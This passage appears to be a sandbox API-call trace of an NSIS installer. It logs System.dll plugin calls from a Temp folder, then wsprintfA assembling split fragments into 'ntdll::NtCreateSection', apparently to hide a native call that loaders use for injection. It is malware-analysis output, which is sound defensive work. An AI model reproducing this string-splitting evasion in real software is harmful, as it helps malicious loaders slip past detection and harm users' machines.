lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.066] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.066] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.066] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.066] lstrcpyA (in: lpString1=0x5cc118, lpString2="" | out: lpString1="") returned="" [0030.066] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.066] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.066] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="0") returned 1 [0030.066] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955696") returned 7 [0030.066] lstrcpyA (in: lpString1=0x424800, lpString2="5955696" | out: lpString1="5955696") returned="5955696" [0030.066] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.066] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.066] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.066] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.066] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.066] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.066] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.066] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.066] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.067] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.067] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.067] lstrcpynA (in: lpString1=0x5d32f4, lpString2="*(i 71559, i 0) p .r1", iMaxLength=1024 | out: lpString1="*(i 71559, i 0) p .r1") returned="*(i 71559, i 0) p .r1" [0030.067] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.067] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.067] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.067] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.067] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.067] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.067] lstrcpyA (in: lpString1=0x5cc118, lpString2="" | out: lpString1="") returned="" [0030.067] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.067] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="0") returned 1 [0030.067] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="71559") returned 5 [0030.067] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5955600") returned 7 [0030.067] lstrcpyA (in: lpString1=0x424400, lpString2="5955600" | out: lpString1="5955600") returned="5955600" [0030.067] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.067] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.067] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.068] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.068] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.068] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.068] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.068] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.068] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.068] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.068] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.068] lstrcpynA (in: lpString1=0x5d0824, lpString2="*(&t255) p .r5", iMaxLength=1024 | out: lpString1="*(&t255) p .r5") returned="*(&t255) p .r5" [0030.068] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.068] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.068] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.068] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.068] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.068] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.068] lstrcpyA (in: lpString1=0x5cc118, lpString2="" | out: lpString1="") returned="" [0030.068] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.068] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.068] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.069] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.069] wsprintfA (in: param_1=0x5cb908, param_2="%d" | out: param_1="5972552") returned 7 [0030.069] lstrcpyA (in: lpString1=0x425400, lpString2="5972552" | out: lpString1="5972552") returned="5972552" [0030.069] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.069] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.069] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.069] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.069] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.069] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.069] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.069] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.069] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.069] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.069] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.069] lstrcpynA (in: lpString1=0x5d03dc, lpString2="user32::wsprintf(p r5, t \x09\x09 '%s%s%s%s%s%i%s', t 'nt', t 'dll::NtC', t 'reat', t 'eSect', t 'ion(p r2, i ', i 0xE, t ', n,')", iMaxLength=1024 | out: lpString1="user32::wsprintf(p r5, t \x09\x09 '%s%s%s%s%s%i%s', t 'nt', t 'dll::NtC', t 'reat', t 'eSect', t 'ion(p r2, i ', i 0xE, t ', n,')") returned="user32::wsprintf(p r5, t \x09\x09 '%s%s%s%s%s%i%s', t 'nt', t 'dll::NtC', t 'reat', t 'eSect', t 'ion(p r2, i ', i 0xE, t ', n,')" [0030.069] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.069] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.069] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.069] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.069] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.069] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.070] lstrcpyA (in: lpString1=0x5cb908, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.070] lstrcpyA (in: lpString1=0x5cbd18, lpString2="user32" | out: lpString1="user32") returned="user32" [0030.070] lstrcpyA (in: lpString1=0x5cc118, lpString2="wsprintf" | out: lpString1="wsprintf") returned="wsprintf" [0030.070] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="%s%s%s%s%s%i%s", iMaxLength=1024 | out: lpString1="%s%s%s%s%s%i%s") returned="%s%s%s%s%s%i%s" [0030.070] lstrcpynA (in: lpString1=0x5cd5c8, lpString2="nt", iMaxLength=1024 | out: lpString1="nt") returned="nt" [0030.070] lstrcpynA (in: lpString1=0x5cd9d0, lpString2="dll::NtC", iMaxLength=1024 | out: lpString1="dll::NtC") returned="dll::NtC" [0030.070] lstrcpynA (in: lpString1=0x5cddd8, lpString2="reat", iMaxLength=1024 | out: lpString1="reat") returned="reat" [0030.070] lstrcpynA (in: lpString1=0x5d43b8, lpString2="eSect", iMaxLength=1024 | out: lpString1="eSect") returned="eSect" [0030.070] lstrcpynA (in: lpString1=0x5d47c0, lpString2="ion(p r2, i ", iMaxLength=1024 | out: lpString1="ion(p r2, i ") returned="ion(p r2, i " [0030.070] lstrcpynA (in: lpString1=0x5d4fd0, lpString2=", n,", iMaxLength=1024 | out: lpString1=", n,") returned=", n," [0030.070] GetModuleHandleA (lpModuleName="user32") returned 0x74500000 [0030.070] GetProcAddress (hModule=0x74500000, lpProcName="wsprintf") returned 0x0 [0030.070] lstrlenA (lpString="wsprintf") returned 8 [0030.070] GetProcAddress (hModule=0x74500000, lpProcName="wsprintfA") returned 0x7452ea00 [0030.070] lstrcpynA (in: lpString1=0x5cb908, lpString2="5972552", iMaxLength=1024 | out: lpString1="5972552") returned="5972552" [0030.070] lstrcpynA (in: lpString1=0x5cb908, lpString2="%s%s%s%s%s%i%s", iMaxLength=1024 | out: lpString1="%s%s%s%s%s%i%s") returned="%s%s%s%s%s%i%s" [0030.070] lstrcpynA (in: lpString1=0x5cd1c0, lpString2="nt", iMaxLength=1024 | out: lpString1="nt") returned="nt" [0030.070] lstrcpynA (in: lpString1=0x5cd5c8, lpString2="dll::NtC", iMaxLength=1024 | out: lpString1="dll::NtC") returned="dll::NtC" [0030.070] lstrcpynA (in: lpString1=0x5cd9d0, lpString2="reat", iMaxLength=1024 | out: lpString1="reat") returned="reat" [0030.070] lstrcpynA (in: lpString1=0x5ca488, lpString2="eSect", iMaxLength=1024 | out: lpString1="eSect") returned="eSect" [0030.070] lstrcpynA (in: lpString1=0x5d43b8, lpString2="ion(p r2, i ", iMaxLength=1024 | out: lpString1="ion(p r2, i ") returned="ion(p r2, i " [0030.070] lstrcpynA (in: lpString1=0x5cddd8, lpString2=", n,", iMaxLength=1024 | out: lpString1=", n,") returned=", n," [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.071] wsprintfA (in: param_1=0x5b2248, param_2="%s%s%s%s%s%i%s" | out: param_1="ntdll::NtCreateSection(p r2, i 14, n,") returned 37 [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2=", n,", iMaxLength=1024 | out: lpString1=", n,") returned=", n," [0030.071] wsprintfA (in: param_1=0x5d47c0, param_2="%d" | out: param_1="14") returned 2 [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2="ion(p r2, i ", iMaxLength=1024 | out: lpString1="ion(p r2, i ") returned="ion(p r2, i " [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2="eSect", iMaxLength=1024 | out: lpString1="eSect") returned="eSect" [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2="reat", iMaxLength=1024 | out: lpString1="reat") returned="reat" [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2="dll::NtC", iMaxLength=1024 | out: lpString1="dll::NtC") returned="dll::NtC" [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2="nt", iMaxLength=1024 | out: lpString1="nt") returned="nt" [0030.071] lstrcpynA (in: lpString1=0x5d47c0, lpString2="%s%s%s%s%s%i%s", iMaxLength=1024 | out: lpString1="%s%s%s%s%s%i%s") returned="%s%s%s%s%s%i%s" [0030.071] wsprintfA (in: param_1=0x5d47c0, param_2="%d" | out: param_1="5972552") returned 7 [0030.071] FreeLibrary (hLibModule=0x5cb908) returned 0 [0030.071] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.071] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.071] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.071] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.071] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.071] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.071] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.071] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.071] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.071] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.071] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.071] lstrcpynA (in: lpString1=0x4226c1, lpString2="5972552", iMaxLength=1024 | out: lpString1="5972552") returned="5972552" [0030.071] lstrlenA (lpString="5972552") returned 7 [0030.071] lstrcpynA (in: lpString1=0x5d32f4, lpString2="*5972552(&t255 .r5)", iMaxLength=1024 | out: lpString1="*5972552(&t255 .r5)") returned="*5972552(&t255 .r5)" [0030.071] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.071] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.071] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.071] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.072] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.072] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.072] lstrcpyA (in: lpString1=0x5cc118, lpString2="5972552" | out: lpString1="5972552") returned="5972552" [0030.072] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.072] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.072] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.072] lstrcpynA (in: lpString1=0x5cb908, lpString2="ntdll::NtCreateSection(p r2, i 14, n,", iMaxLength=1024 | out: lpString1="ntdll::NtCreateSection(p r2, i 14, n,") returned="ntdll::NtCreateSection(p r2, i 14, n," [0030.072] lstrcpyA (in: lpString1=0x425400, lpString2="ntdll::NtCreateSection(p r2, i 14, n," | out: lpString1="ntdll::NtCreateSection(p r2, i 14, n,") returned="ntdll::NtCreateSection(p r2, i 14, n," [0030.072] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.072] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.072] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.072] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.072] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.072] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.072] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.072] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.072] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.072] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.072] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.072] lstrcpynA (in: lpString1=0x4226c0, lpString2="ntdll::NtCreateSection(p 